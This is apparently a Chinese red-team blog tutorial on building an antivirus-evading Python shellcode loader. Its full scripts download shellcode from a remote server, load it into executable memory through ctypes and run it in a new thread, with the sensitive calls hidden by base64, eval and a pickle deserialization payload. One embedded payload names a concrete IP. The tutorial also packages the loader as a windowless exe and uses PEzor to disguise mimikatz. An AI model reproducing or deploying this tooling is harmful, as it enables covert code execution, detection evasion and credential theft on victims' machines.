测试的时候,好像是都过了.
因为网上的demo已经报毒很多了,然后就想这修改一下.
主要思想
是运用了反序列化,分离shellcode,敏感函数base64加密eval()执行.
import tkinter as tk import base64 import ctypes import urllib.request import codecs import pickle def change(): var=entry.get() b64=str(base64.b64encode(var.encode("utf-8")), "utf-8") print(str(b64)) code = """ import codecs,urllib.request,ctypes code = urllib.request.urlopen('http://vps的ip/code.txt').read() code = base64.b64decode(code) code =codecs.escape_decode(code)[0] code = bytearray(code) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(code)).from_buffer(code) string=b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgICAgIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCAKICAgICAgICBidWYsIAogICAgICAgIGN0eXBlcy5jX2ludChsZW4oY29kZSkpCiAgICAp' eval(str(base64.b64decode(string),'utf-8')) handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) """ class A(object): def __reduce__(self): return (exec, (code,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) print(ret_base64) if __name__ == '__main__': window = tk.Tk() window.title("免杀shellcode -雷石安全") window.geometry('300x60+200+300') entry = tk.Entry(window, width=40) entry.pack() button=tk.Button(window,text='生成',command=change).pack() window.mainloop()
第一步:
生成payload
第二步:
放如小框框中,点击生成,会出现两个值:
第一个值为base64后的需要分离的shellcode,放到服务器中
用python开一个小服务器(可以去访问看看,通没通).
第两个值,为我们反序列化后的代码,中间那一群绿绿的代码,都会在我们反序列化的时候自动执行.
加载器py:
import base64,pickle shellcode =b'gASV4gMAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFjDAwAACmltcG9ydCBjb2RlY3MsdXJsbGliLnJlcXVlc3QsY3R5cGVzCmNvZGUgPSB1cmxsaWIucmVxdWVzdC51cmxvcGVuKCdodHRwOi8vNDcuMTEyLjI0Mi43MC9jb2RlLnR4dCcpLnJlYWQoKQpjb2RlID0gYmFzZTY0LmI2NGRlY29kZShjb2RlKQpjb2RlID1jb2RlY3MuZXNjYXBlX2RlY29kZShjb2RlKVswXQpjb2RlID0gYnl0ZWFycmF5KGNvZGUpCgpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CgpwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQpidWYgPSAoY3R5cGVzLmNfY2hhciAqIGxlbihjb2RlKSkuZnJvbV9idWZmZXIoY29kZSkKICAgIApzdHJpbmc9YidZM1I1Y0dWekxuZHBibVJzYkM1clpYSnVaV3d6TWk1U2RHeE5iM1psVFdWdGIzSjVLQW9nSUNBZ0lDQWdJR04wZVhCbGN5NWpYM1ZwYm5RMk5DaHdkSElwTENBS0lDQWdJQ0FnSUNCaWRXWXNJQW9nSUNBZ0lDQWdJR04wZVhCbGN5NWpYMmx1ZENoc1pXNG9ZMjlrWlNrcENpQWdJQ0FwJwpldmFsKHN0cihiYXNlNjQuYjY0ZGVjb2RlKHN0cmluZyksJ3V0Zi04JykpCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKAogICAgICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMuY191aW50NjQocHRyKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMuY19pbnQoMCksIAogICAgICAgIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkKKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoY3R5cGVzLmNfaW50KGhhbmRsZSksY3R5cGVzLmNfaW50KC0xKSkKlIWUUpQu' #pickle.loads(base64.b64decode(shellcode)) strinq=b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp' eval(str(base64.b64decode(strinq),'utf-8'))
带进去生成的第二个值
直接运行,或者
pyinstaller -F loader.py --noconsole -i 13.ico
生成exe(内部pyc)文件,当然脚本把它反编译出来pyc,然后查看源码(https://tool.lu/pyc/)不错的网址.
补充
这些显示不够,比如猕猴桃怎么免杀呢?
推荐一个在红队学院星球看到的项目(当然这个可以在,去特征字符串以后再次加固)
PEzor
git clone https://github.com/phra/PEzor.git cd PEzor sudo bash install.sh bash PEzor.sh –h
安装完会报错
下载https://github.com/EgeBalci/sgn,解压后放入PEzor的目录
然后
export PATH=$PATH:~/go/bin/:/root/dvwa/PEzor:/root/dvwa/PEzor/deps/donut_v0.9.3/:/root/dvwa/PEzor/deps/wclang/_prefix_PEzor_/bin/
注意:/home/dvwa/PEzor,要是自己的路径
而且此命令只在当前shell下有效
输入后便可以愉快的玩耍了.
比如,休眠120秒上线的mimikatz
PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz.exe -z 2
